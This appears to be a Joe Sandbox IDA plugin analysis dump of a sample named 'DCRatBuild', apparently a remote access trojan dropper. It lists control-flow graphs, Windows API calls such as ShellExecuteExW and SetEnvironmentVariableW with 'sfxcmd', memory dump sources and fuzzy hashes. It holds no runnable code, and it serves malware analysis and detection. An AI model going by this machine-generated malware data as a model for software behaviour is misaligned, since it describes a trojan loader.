                                  control_flow_graph 796 8ece22-8ece3a call 8ee360 799 8ed08b-8ed093 796->799 800 8ece40-8ece4c call 8f35b3 796->800 800->799 803 8ece52-8ece7a call 8ef350 800->803 806 8ece7c 803->806 807 8ece84-8ece91 803->807 806->807 808 8ece95-8ece9e 807->808 809 8ece93 807->809 810 8eced6 808->810 811 8ecea0-8ecea2 808->811 809->808 813 8eceda-8ecedd 810->813 812 8eceaa-8ecead 811->812 814 8ed03c-8ed041 812->814 815 8eceb3-8ecebb 812->815 816 8ecedf-8ecee2 813->816 817 8ecee4-8ecee6 813->817 820 8ed036-8ed03a 814->820 821 8ed043 814->821 818 8ed055-8ed05d 815->818 819 8ecec1-8ecec7 815->819 816->817 822 8ecef9-8ecf0e call 8db493 816->822 817->822 823 8ecee8-8eceef 817->823 826 8ed05f-8ed061 818->826 827 8ed065-8ed06d 818->827 819->818 824 8ececd-8eced4 819->824 820->814 825 8ed048-8ed04c 820->825 821->825 831 8ecf27-8ecf32 call 8da180 822->831 832 8ecf10-8ecf1d call 8e17ac 822->832 823->822 828 8ecef1 823->828 824->810 824->812 825->818 826->827 827->813 828->822 838 8ecf4f-8ecf5c ShellExecuteExW 831->838 839 8ecf34-8ecf4b call 8db239 831->839 832->831 837 8ecf1f 832->837 837->831 841 8ed08a 838->841 842 8ecf62-8ecf6f 838->842 839->838 841->799 844 8ecf82-8ecf84 842->844 845 8ecf71-8ecf78 842->845 847 8ecf9b-8ecfba call 8ed2e6 844->847 848 8ecf86-8ecf8f 844->848 845->844 846 8ecf7a-8ecf80 845->846 846->844 849 8ecff1-8ecffd CloseHandle 846->849 847->849 864 8ecfbc-8ecfc4 847->864 848->847 858 8ecf91-8ecf99 ShowWindow 848->858 851 8ed00e-8ed01c 849->851 852 8ecfff-8ed00c call 8e17ac 849->852 856 8ed01e-8ed020 851->856 857 8ed079-8ed07b 851->857 852->851 865 8ed072 852->865 856->857 859 8ed022-8ed028 856->859 857->841 862 8ed07d-8ed07f 857->862 858->847 859->857 863 8ed02a-8ed034 859->863 862->841 866 8ed081-8ed084 ShowWindow 862->866 863->857 864->849 867 8ecfc6-8ecfd7 GetExitCodeProcess 864->867 865->857 866->841 867->849 868 8ecfd9-8ecfe3 867->868 869 8ecfea 868->869 870 8ecfe5 868->870 869->849 870->869
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 008ECF54
                                  • ShowWindow.USER32(?,00000000), ref: 008ECF93
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 008ECFCF
                                  • CloseHandle.KERNEL32(?), ref: 008ECFF5
                                  • ShowWindow.USER32(?,00000001), ref: 008ED084
                                    • Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                  • String ID: $.exe$.inf
                                  • API String ID: 3686203788-2452507128
                                  • Opcode ID: 1a3d26effe68dc574d4c5b2e0abc1eba35a10a4a3e6cf7ca8ca83b86f014fb38
                                  • Instruction ID: 7e0985f0dba3e9e620406e7340282a740bb163c03695b98f7b37498994a6fbaf
                                  • Opcode Fuzzy Hash: 1a3d26effe68dc574d4c5b2e0abc1eba35a10a4a3e6cf7ca8ca83b86f014fb38
                                  • Instruction Fuzzy Hash: 1461F5719187C19AD731DF66D8046AB7BEAFF83304F088819F5C1D7250DBB1898ADB52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 871 8fa058-8fa071 872 8fa087-8fa08c 871->872 873 8fa073-8fa083 call 8fe6ed 871->873 875 8fa08e-8fa096 872->875 876 8fa099-8fa0bd MultiByteToWideChar 872->876 873->872 883 8fa085 873->883 875->876 877 8fa0c3-8fa0cf 876->877 878 8fa250-8fa263 call 8eec4a 876->878 880 8fa123 877->880 881 8fa0d1-8fa0e2 877->881 887 8fa125-8fa127 880->887 884 8fa0e4-8fa0f3 call 901a30 881->884 885 8fa101-8fa112 call 8f8518 881->885 883->872 891 8fa245 884->891 897 8fa0f9-8fa0ff 884->897 885->891 898 8fa118 885->898 890 8fa12d-8fa140 MultiByteToWideChar 887->890 887->891 890->891 894 8fa146-8fa158 call 8fa72c 890->894 895 8fa247-8fa24e call 8fa2c0 891->895 900 8fa15d-8fa161 894->900 895->878 902 8fa11e-8fa121 897->902 898->902 900->891 903 8fa167-8fa16e 900->903 902->887 904 8fa1a8-8fa1b4 903->904 905 8fa170-8fa175 903->905 907 8fa1b6-8fa1c7 904->907 908 8fa200 904->908 905->895 906 8fa17b-8fa17d 905->906 906->891 909 8fa183-8fa19d call 8fa72c 906->909 911 8fa1c9-8fa1d8 call 901a30 907->911 912 8fa1e2-8fa1f3 call 8f8518 907->912 910 8fa202-8fa204 908->910 909->895 924 8fa1a3 909->924 914 8fa23e-8fa244 call 8fa2c0 910->914 915 8fa206-8fa21f call 8fa72c 910->915 911->914 927 8fa1da-8fa1e0 911->927 912->914 923 8fa1f5 912->923 914->891 915->914 929 8fa221-8fa228 915->929 928 8fa1fb-8fa1fe 923->928 924->891 927->928 928->910 930 8fa22a-8fa22b 929->930 931 8fa264-8fa26a 929->931 932 8fa22c-8fa23c WideCharToMultiByte 930->932 931->932 932->914 933 8fa26c-8fa273 call 8fa2c0 932->933 933->895
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008F4E35,008F4E35,?,?,?,008FA2A9,00000001,00000001,3FE85006), ref: 008FA0B2
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 008FA138
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008FA232
                                  • __freea.LIBCMT ref: 008FA23F
                                    • Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A
                                  • __freea.LIBCMT ref: 008FA248
                                  • __freea.LIBCMT ref: 008FA26D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  • Opcode ID: 43d6cde86ef1a29b2168aa49facb7c60e9852cb22c304c72a24a42a85a8ff94e
                                  • Instruction ID: 8f0edcce8201b7741997e7ccfb72ba9c8766b94295d7ec89c656f5206c6a2d0f
                                  • Opcode Fuzzy Hash: 43d6cde86ef1a29b2168aa49facb7c60e9852cb22c304c72a24a42a85a8ff94e
                                  • Instruction Fuzzy Hash: 3A51CFB271021AAFEB298F74CC41EBB77A9FB44770F154228FE09D6141EB35DC5086A2

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
                                    • Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2
                                  • OleInitialize.OLE32(00000000), ref: 008EA34E
                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008EA385
                                  • SHGetMalloc.SHELL32(00918430), ref: 008EA38F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                  • String ID: riched20.dll$3To
                                  • API String ID: 3498096277-2168385784
                                  • Opcode ID: 55c1829269ed5e41b615128fe54e1a3f3eba3b34275b34b4dd440837ed25ec61
                                  • Instruction ID: a7416e752b4ebb677715dba336240cd5c468bc12d280f1620c47bc1e50019cd4
                                  • Opcode Fuzzy Hash: 55c1829269ed5e41b615128fe54e1a3f3eba3b34275b34b4dd440837ed25ec61
                                  • Instruction Fuzzy Hash: 61F049B1D0420EABCB10AF9AD8499EFFBFCEF95305F00415AE914E2240DBB446499FA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 940 8d99b0-8d99d1 call 8ee360 943 8d99dc 940->943 944 8d99d3-8d99d6 940->944 946 8d99de-8d99fb 943->946 944->943 945 8d99d8-8d99da 944->945 945->946 947 8d99fd 946->947 948 8d9a03-8d9a0d 946->948 947->948 949 8d9a0f 948->949 950 8d9a12-8d9a31 call 8d70bf 948->950 949->950 953 8d9a39-8d9a57 CreateFileW 950->953 954 8d9a33 950->954 955 8d9a59-8d9a7b GetLastError call 8db66c 953->955 956 8d9abb-8d9ac0 953->956 954->953 965 8d9a7d-8d9a9f CreateFileW GetLastError 955->965 966 8d9aaa-8d9aaf 955->966 958 8d9ae1-8d9af5 956->958 959 8d9ac2-8d9ac5 956->959 962 8d9af7-8d9b0f call 8dfe56 958->962 963 8d9b13-8d9b1e 958->963 959->958 961 8d9ac7-8d9adb SetFileTime 959->961 961->958 962->963 968 8d9aa5-8d9aa8 965->968 969 8d9aa1 965->969 966->956 970 8d9ab1 966->970 968->956 968->966 969->968 970->956
                                  APIs
                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008D78AD,?,00000005,?,00000011), ref: 008D9A4C
                                  • GetLastError.KERNEL32(?,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9A59
                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008D78AD,?,00000005,?), ref: 008D9A8E
                                  • GetLastError.KERNEL32(?,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9A96
                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9ADB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File$CreateErrorLast$Time
                                  • String ID:
                                  • API String ID: 1999340476-0
                                  • Opcode ID: 358c17e2ca83369693dbfb0bb9595ffd2da4c522f1e3098d25a77e75c94d49ba
                                  • Instruction ID: a292924fb3e09453551bb409c064f3dffedba3d5db3247885b174a7e76f31baa
                                  • Opcode Fuzzy Hash: 358c17e2ca83369693dbfb0bb9595ffd2da4c522f1e3098d25a77e75c94d49ba
                                  • Instruction Fuzzy Hash: 1A4146315487566FE3209B24CC05BDABBE4FB05324F10071BF5E4D62D1E775A988CB92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 999 8ea2c7-8ea2e6 GetClassNameW 1000 8ea30e-8ea310 999->1000 1001 8ea2e8-8ea2fd call 8e17ac 999->1001 1003 8ea31b-8ea31f 1000->1003 1004 8ea312-8ea315 SHAutoComplete 1000->1004 1006 8ea2ff-8ea30b FindWindowExW 1001->1006 1007 8ea30d 1001->1007 1004->1003 1006->1007 1007->1000
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000050), ref: 008EA2DE
                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 008EA315
                                    • Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2
                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008EA305
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                  • String ID: EDIT
                                  • API String ID: 4243998846-3080729518
                                  • Opcode ID: af0663355d2d3f94ea01b656b8b9666a925f848d7b719ec2af622922cee89a74
                                  • Instruction ID: ae7b2724b32b25839e22bfb6267d5a2c32c042c0245935641fa718a78eb2b9e2
                                  • Opcode Fuzzy Hash: af0663355d2d3f94ea01b656b8b9666a925f848d7b719ec2af622922cee89a74
                                  • Instruction Fuzzy Hash: 86F0E232A052287BE7305765AC49F9B73ACEF47F00F040052BE04E7280D760A945CAF6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1008 8ed287-8ed2b2 call 8ee360 SetEnvironmentVariableW call 8dfbd8 1012 8ed2b7-8ed2bb 1008->1012 1013 8ed2df-8ed2e3 1012->1013 1014 8ed2bd-8ed2c1 1012->1014 1015 8ed2ca-8ed2d1 call 8dfcf1 1014->1015 1018 8ed2c3-8ed2c9 1015->1018 1019 8ed2d3-8ed2d9 SetEnvironmentVariableW 1015->1019 1018->1015 1019->1013
                                  APIs
                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008ED29D
                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008ED2D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: EnvironmentVariable
                                  • String ID: sfxcmd$sfxpar
                                  • API String ID: 1431749950-3493335439
                                  • Opcode ID: 1997a21ab0103160ef385025670d3937f277f15849d71eb3df3bbc5efb6fabe0
                                  • Instruction ID: 4f522beb7b536fcf899fec0f467a2cab897d6e2bd8f0a8bc370318c098a622e8
                                  • Opcode Fuzzy Hash: 1997a21ab0103160ef385025670d3937f277f15849d71eb3df3bbc5efb6fabe0
                                  • Instruction Fuzzy Hash: 81F0A771815328FAD7206F959C09ABE776CFF0AB55B004112FE89D6241D660DD40EAF1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1020 8d984e-8d985a 1021 8d985c-8d9864 GetStdHandle 1020->1021 1022 8d9867-8d987e ReadFile 1020->1022 1021->1022 1023 8d98da 1022->1023 1024 8d9880-8d9889 call 8d9989 1022->1024 1025 8d98dd-8d98e2 1023->1025 1028 8d988b-8d9893 1024->1028 1029 8d98a2-8d98a6 1024->1029 1028->1029 1030 8d9895 1028->1030 1031 8d98a8-8d98b1 GetLastError 1029->1031 1032 8d98b7-8d98bb 1029->1032 1033 8d9896-8d98a0 call 8d984e 1030->1033 1031->1032 1034 8d98b3-8d98b5 1031->1034 1035 8d98bd-8d98c5 1032->1035 1036 8d98d5-8d98d8 1032->1036 1033->1025 1034->1025 1035->1036 1038 8d98c7-8d98d0 GetLastError 1035->1038 1036->1025 1038->1036 1040 8d98d2-8d98d3 1038->1040 1040->1033
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 008D985E
                                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 008D9876
                                  • GetLastError.KERNEL32 ref: 008D98A8
                                  • GetLastError.KERNEL32 ref: 008D98C7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorLast$FileHandleRead
                                  • String ID:
                                  • API String ID: 2244327787-0
                                  • Opcode ID: 509e8d868013603a8f017c13eb96b2dfc0f952385fb221e3965be3fe949aadb4
                                  • Instruction ID: 45fa11183c510de8536c24d49cbfbc7a864213da266f7e8cd877f80cb8393f32
                                  • Opcode Fuzzy Hash: 509e8d868013603a8f017c13eb96b2dfc0f952385fb221e3965be3fe949aadb4
                                  • Instruction Fuzzy Hash: F8115A30904208EFDB205A55C804A797BADFB06B35F10C73BE8AAC6B90D7759E40BB52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1041 8fa4f4-8fa508 1042 8fa50a-8fa513 1041->1042 1043 8fa515-8fa530 LoadLibraryExW 1041->1043 1044 8fa56c-8fa56e 1042->1044 1045 8fa559-8fa55f 1043->1045 1046 8fa532-8fa53b GetLastError 1043->1046 1049 8fa568 1045->1049 1050 8fa561-8fa562 FreeLibrary 1045->1050 1047 8fa53d-8fa548 LoadLibraryExW 1046->1047 1048 8fa54a 1046->1048 1051 8fa54c-8fa54e 1047->1051 1048->1051 1052 8fa56a-8fa56b 1049->1052 1050->1049 1051->1045 1053 8fa550-8fa557 1051->1053 1052->1044 1053->1052
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,008F3713,00000000,00000000,?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue), ref: 008FA526
                                  • GetLastError.KERNEL32(?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue,00907348,00907350,00000000,00000364,?,008F9077), ref: 008FA532
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue,00907348,00907350,00000000), ref: 008FA540
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 10d497f8e106dbfd948ccd6bc653a088156dd3984353f08cc345d556419ccc8f
                                  • Instruction ID: fc1a140dc3a41ef77c3e9d06ed8a6265c135a40ca0bf54aad4f20bfe2804e388
                                  • Opcode Fuzzy Hash: 10d497f8e106dbfd948ccd6bc653a088156dd3984353f08cc345d556419ccc8f
                                  • Instruction Fuzzy Hash: 2C01FC7662922AAFC7258BF89C44A76775CFF49BB17104520FA0ED7240D721D900D6E1
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,008DCC94,00000001,?,?,?,00000000,008E4ECD,?,?,?), ref: 008D9F4C
                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,008E4ECD,?,?,?,?,?,008E4972,?), ref: 008D9F8E
                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,008DCC94,00000001,?,?), ref: 008D9FB8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FileWrite$Handle
                                  • String ID:
                                  • API String ID: 4209713984-0
                                  • Opcode ID: dc25b265546c367b39e5cb0ac9d99f45f0890a10c9c19c55ece44849bf761330
                                  • Instruction ID: fddc8e199c7cd733bb6fcf14314dc5061284cd72c6a937f9f82c90586a98eb25
                                  • Opcode Fuzzy Hash: dc25b265546c367b39e5cb0ac9d99f45f0890a10c9c19c55ece44849bf761330
                                  • Instruction Fuzzy Hash: 7F31D2712083059BDB149F14D84876ABBA8FB90710F04875AF985DA381CB75DD48CBA2
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA22E
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA261
                                  • GetLastError.KERNEL32(?,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA27E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$ErrorLast
                                  • String ID:
                                  • API String ID: 2485089472-0
                                  • Opcode ID: 60b77901a217df5f07fa637570b9b029b3a2adb008b3250a59b7744c12c9f4ad
                                  • Instruction ID: 7773a45823328d75fcf8f5cf3fe0affd4e68b04c2b784af9b85ca80641e0584a
                                  • Opcode Fuzzy Hash: 60b77901a217df5f07fa637570b9b029b3a2adb008b3250a59b7744c12c9f4ad
                                  • Instruction Fuzzy Hash: B601F531191218A6DF3AABBA8C05BEE335DFF07751F244657F801E6251CB66CA40C6B3
                                  APIs
                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008FB019
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-3916222277
                                  • Opcode ID: 9cc3a866d0a340329feae2c48db7a7354517aaa498fb180cfebda56f21d5d0ed
                                  • Instruction ID: 7bd9ede639fdf9a6da2b29d1e69fdebda39b60b54290c01bb106f0a82393d33a
                                  • Opcode Fuzzy Hash: 9cc3a866d0a340329feae2c48db7a7354517aaa498fb180cfebda56f21d5d0ed
